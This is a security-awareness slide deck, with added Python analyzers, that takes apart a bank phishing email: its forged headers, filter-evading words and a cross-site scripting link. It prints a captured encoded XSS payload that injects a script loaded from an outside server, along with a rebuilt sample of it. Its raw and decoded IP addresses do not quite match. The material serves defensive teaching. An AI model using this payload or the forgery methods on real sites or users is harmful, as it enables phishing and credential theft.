Deconstructing A Phishing Scheme
Christopher Duffy, CISSP
Agenda
• Definition
• Examples
• Breakdown
• Follow Through
• Statistics
• Sites
Defined
"phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication."
- Wikipedia
Catching a Phish
• Complete Attack
• 1st effort to use clients as relay
• Cross-Site Scripting Attack
– The email was not sent from the bank.
– The web page it linked to contained extra characters in the URL address line, added on to the bank's legitimate web address.
– The page was hosted by the bank's servers; the attacker overlaid it with altered elements to give the appearance of a legitimate "Account Verification" page.
Email Breakdown
• Header Info
– Incorrect Return Address
Return-Path: [email protected]
– The return address is generated from the From: address and applied by the final SMTP server to handle the message.
– Most scams forge the From: address.
– This can be the only obfuscation a phisher employs; forging From: headers is a trivial task, and is often a feature of normal client mail user agents.
True Received: Header
• Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75)
– Received: headers are written in reverse; in this case, 82.67.84.75 is the last SMTP server to handle the message before the final destination. As such, it is the only trustworthy Received: information, and is in fact the true source of the message.
– 82.67.84.75 is a node in a French consumer ISP, and is likely a home PC previously compromised by the phisher.
Forged Received: Header
• Received: from [email protected] ([82.67.84.75]) by [email protected] with Microsoft SMTPSVC(5.0.4416.5263)
– This Received: line is forged. Some anti-spam software will trust the Received: headers as a means of authenticating the source of the message, so adding extra Received: lines is an anti-spam evasion technique.
– Additional evidence that this is a forgery is the fact that the IP address is identical to the address in the true Received: header. Also notice the presence of the "[email protected]" string in the fake server name; normal server names cannot have @-signs in their name.
– The names include the random dictionary words "harpsichord" and "poland" in an effort to evade Bayesian spam filters.
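The two Received: checks above (an '@' in a claimed server name, and a lower hop repeating the true source's IP) as a small header analyzer. This is an added example, not code from the deck; the header block is constructed, with placeholder addresses and server names, and only the IP and the dictionary words follow the deck's example.

```python
import re

# Constructed header block modelled on the deck's example message. The
# addresses and server names are placeholders; the IP 82.67.84.75 and the
# "harpsichord"/"poland" dictionary words are the ones the deck discusses.
# Headers appear as in the message: the most recent relay's line is on top.
SAMPLE_HEADERS = """\
Return-Path: <billing@bank.example>
Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75) by mx.recipient.example
Received: from harpsichord@poland.example ([82.67.84.75]) by mail.bank.example with Microsoft SMTPSVC(5.0.4416.5263)
From: Bank Billing <billing@bank.example>
Date: Tue, 12 Nov 2008 07:12:03 -0100
"""

RECEIVED_RE = re.compile(r"^Received:\s+from\s+(\S+)\s+\(\[?([\d.]+)\]?\)", re.M)


def parse_received(headers: str) -> list:
    """Return the Received: hops in header order (top = most recent relay)."""
    return [{"host": m.group(1), "ip": m.group(2)} for m in RECEIVED_RE.finditer(headers)]


def flag_received_chain(headers: str) -> list:
    """Apply the deck's rule: only the top hop (written by our own relay) is
    trustworthy; every hop below it arrived with the message and may be forged."""
    hops = parse_received(headers)
    if not hops:
        return ["no Received: headers found"]
    true_source = hops[0]["ip"]
    findings = []
    for i, hop in enumerate(hops[1:], start=1):
        if "@" in hop["host"]:
            # A hostname can never contain '@'; someone pasted an address here.
            findings.append(f"hop {i}: '@' in server name {hop['host']} (not a valid hostname)")
        if hop["ip"] == true_source:
            # A relay that claims to have received the message *from* the same
            # IP that later handed it to us is the sender describing itself.
            findings.append(f"hop {i}: IP {hop['ip']} duplicates the true source hop")
    return findings


if __name__ == "__main__":
    for line in flag_received_chain(SAMPLE_HEADERS):
        print(line)
```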
Incorrect Time Stamp
• Tue, 12 Nov 2008 07:12:03 -0100
– Timestamp most likely from a compromised PC (out-of-sync clock)
• Forged From: Name and Address
– From: Suntrust Billing [email protected]
• The forged From: field is reflected in the Return-Path field.
– Most likely a true email address within Suntrust
• Impersonal To: Name, if any
– To: Valued Suntrust Customer, or
– To: [email protected]
– No Salutation
Threats
• Account Compromised
• Suspension
• Upgrades in the Name of Security
– Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs. VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.
Proceed to customer service department>>
No RTF
• HTML-only message
Content-Type: text/html;
– Delivered in HTML only; no RTF or plain-text alternative.
– Mail User Agent (MUA) Compatibility
What???
• Spurious Random Words
Content-Description: lonesome hysteria ulterior
• Randomizer to avoid Bayesian spam filters
Hijacked
• Use of Trusted Logos & Images
• Linked Directly to Site
• Sense of Legitimacy
ESL
• Phishing activity outside US = non-native English
• Origination of Phishing & Spam
– Countries Hosting Phishing Sites Q1 2008
• Russia 11.66
• China 10.3
• Germany 5.64
• Romania 5.09
XSS
• Cross Site Scripting Attacks
– Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it.
XSS Deconstruction

```
<a title=3D"http://suntrust.com/" target=3D"_blank"
herf=3D"http://www.sun=trust.com/onlinestatements/index.asp?
AccountVerify=3Ddf4g653432fvfdsGFSg45=wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E
%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a> to confirm you=r bank account records. <br>
```

• Screen Tip Target Obfuscation
`<a title=3D"http://suntrust.com/" target=3D"_blank"`
– Mouse over to distract from the real target link
XSS Payload
• Link to True Site
`herf=3D"http://www.sun=trust.com/onlinestatements/index.asp?AccountVerify=3Ddf4g653432fvfdsGFSg45=`
– Link target is Suntrust; what follows is the XSS payload (hex encoded)
• `wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a>`
Hex Decoded
• Hex-encoded HTTP parameter string. Decoded, it reads: `"><SCRIPT language=javascript src="http://218.103.23.138:8081/sun/sun.js"></SCRIPT>`
• Link executes sun.js
• 218.103.23.138 resolves to an ISP in Hong Kong
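The three preceding slides (screen-tip obfuscation, the two-layer encoded payload, and the hex decode) as one analyzer that peels both layers, quoted-printable transfer encoding and URL percent-encoding, and reports what the link really does. This is an added example, not code from the deck; the HTML fragment is constructed to mirror the deck's anchor tag, with a placeholder bank hostname and the documentation address 203.0.113.5 standing in for the script host.

```python
import quopri
import re
from urllib.parse import parse_qs, urlsplit

# Constructed quoted-printable (QP) HTML fragment modelled on the deck's anchor
# tag. The bank hostname and 203.0.113.5 (TEST-NET-3) are placeholders; the
# payload shape (promo= closing the attribute and injecting a remote <script>)
# follows the deck. "=3D" is QP for "=", "=\n" is a QP soft line break.
SAMPLE_QP = (
    b'<a title=3D"http://bank.example/" target=3D"_blank" '
    b'href=3D"http://www.bank.example/onlinestatements/index.asp?'
    b'AccountVerify=3Ddf4g653432&promo=3D%22%3E%3Cscript+language%3Djavascript'
    b'+src%3D%22http%3A%2F%2F%32=\n'
    b'03%2E0%2E113%2E5%3A8081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">'
    b'click here</a> to confirm you=\nr bank account records.'
)


def decode_anchor(qp_html: bytes) -> dict:
    """Undo the QP transfer encoding and pull the <a> tag's attributes."""
    html = quopri.decodestring(qp_html).decode("ascii")
    attrs = dict(re.findall(r'(\w+)="([^"]*)"', html))
    return {"title": attrs.get("title", ""), "href": attrs.get("href", "")}


def analyse_link(qp_html: bytes) -> dict:
    """Second layer: URL-decode the query string and look for an injected script."""
    anchor = decode_anchor(qp_html)
    target = urlsplit(anchor["href"])
    # parse_qs percent-decodes each value and turns '+' into a space, which
    # makes the hex-encoded promo parameter readable HTML again.
    params = parse_qs(target.query, keep_blank_values=True)
    promo = params.get("promo", [""])[0]
    src = re.search(r'<script[^>]*\ssrc="([^"]+)"', promo, re.I)
    src_host = urlsplit(src.group(1)).hostname if src else None
    return {
        # Tooltip (title=) vs. real destination: the mouse-over text is the
        # bare bank URL while the href carries the long encoded payload.
        "tooltip_matches_target": anchor["title"] == anchor["href"],
        "target_host": target.hostname,  # the bank's real server
        "promo_decoded": promo,
        "injects_script": bool(re.search(r'"><script', promo, re.I)),
        # Script loaded from a host other than the bank: the reflected XSS
        # pulls sun.js from the phisher's server, not from the bank.
        "script_src_host": src_host,
        "third_party_script": src_host is not None and src_host != target.hostname,
    }


if __name__ == "__main__":
    for key, value in analyse_link(SAMPLE_QP).items():
        print(f"{key}: {value}")
```

Note how the digit hidden as `%32` across the QP soft break only becomes visible after both layers are removed, which is why a filter looking for a literal IP in the raw message misses it.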
Top Phishing
• Keyloggers & Malicious Code, up 93% from '07
• ISPs
• IRS
Mitigation Through Education
– Don't click to follow
– Don't trust links
– No personal information via email
– Check out the URL
– Let your fingers do the walking: type it in!
SecurityCartoon.com
More Information
• Internet Crime Center: www.ic3.gov
• Identity Theft: What to Do if It Happens to You: http://www.privacyrights.org/fs/fs17a.htm
• Federal Trade Commission phishing information: http://www.ftc.gov/bcp/conline/pubs/alerts/phishingalrt.htm
• Video tutorial on phishing: http://www.pcsecuritysecrets.com/tips/media-chase_bank_fraud_and_phising.php
• Microsoft Phishing Information Website: http://www.microsoft.com/protect/yourself/phishing/identify.mspx
• Anti-Phishing Non-Profit Sites: www.antiphishing.org, www.apwg.com, www.bestsecuritytips.com, www.cyberstreet.org
• Carnegie Mellon University game: http://cups.cs.cmu.edu/antiphishing_phil/new/index.html